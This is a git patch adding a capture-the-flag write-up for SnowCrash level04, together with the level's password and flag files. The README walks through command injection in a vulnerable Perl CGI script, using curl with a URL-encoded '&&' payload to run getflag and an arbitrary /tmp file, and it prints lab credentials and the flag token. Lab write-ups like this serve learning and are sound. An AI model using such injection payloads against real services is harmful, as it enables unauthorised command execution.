From ff90b625c518151d278e347d445c9fdf72496ff0 Mon Sep 17 00:00:00 2001 From: Maieul BOYER Date: Mon, 19 Jan 2026 16:27:08 +0100 Subject: [PATCH] level04 --- levels/04/README.md | 96 +++++++++++++++++++++++++++++++++++++++++++++ levels/04/flag | 1 + levels/04/passwd | 1 + 3 files changed, 98 insertions(+) create mode 100644 levels/04/README.md create mode 100644 levels/04/flag create mode 100644 levels/04/passwd diff --git a/levels/04/README.md b/levels/04/README.md new file mode 100644 index 0000000..22e4750 --- /dev/null +++ b/levels/04/README.md @@ -0,0 +1,96 @@ +# Level 04 + +## how to login + +username: level04 + +password: qi0maab88jeaj46qoumi7maus + +## Goal + +run `getflag` as user `flag04` + +## Actually doing something + +```bash +level04@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl* +-r-x------ 1 level04 level04 675 Apr 3 2012 .profile* +``` + +Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl + +```perl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; +} +x(param("x")); +``` + +This reeks of exploit + +As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it + +The issue is how it returns it... + +It forward it to a shell string, and print the result. +This is as secure as having a litteral endpoint that takes a command and return the result. + +Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo` +command we can run whatever we want + +for example `getflag` + +we want this +```perl + print `echo $y 2>&1` +``` +to become +```perl + print `echo idk && getflag 2>&1` +``` + +We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag` + +but if we do it dumbly, nothing happens + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag' +idk +``` + +Why ? + +Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it. + +How ? + +The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&` + +lets replace it to get `idk%26%26getflag` and voila ! + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag' +GetExploited +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo' +idk +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +Look mom, I recycle my stuff ! diff --git a/levels/04/flag b/levels/04/flag new file mode 100644 index 0000000..920bae8 --- /dev/null +++ b/levels/04/flag @@ -0,0 +1 @@ +ne2searoevaevoem4ov4ar8ap diff --git a/levels/04/passwd b/levels/04/passwd new file mode 100644 index 0000000..f5e998e --- /dev/null +++ b/levels/04/passwd @@ -0,0 +1 @@ +qi0maab88jeaj46qoumi7maus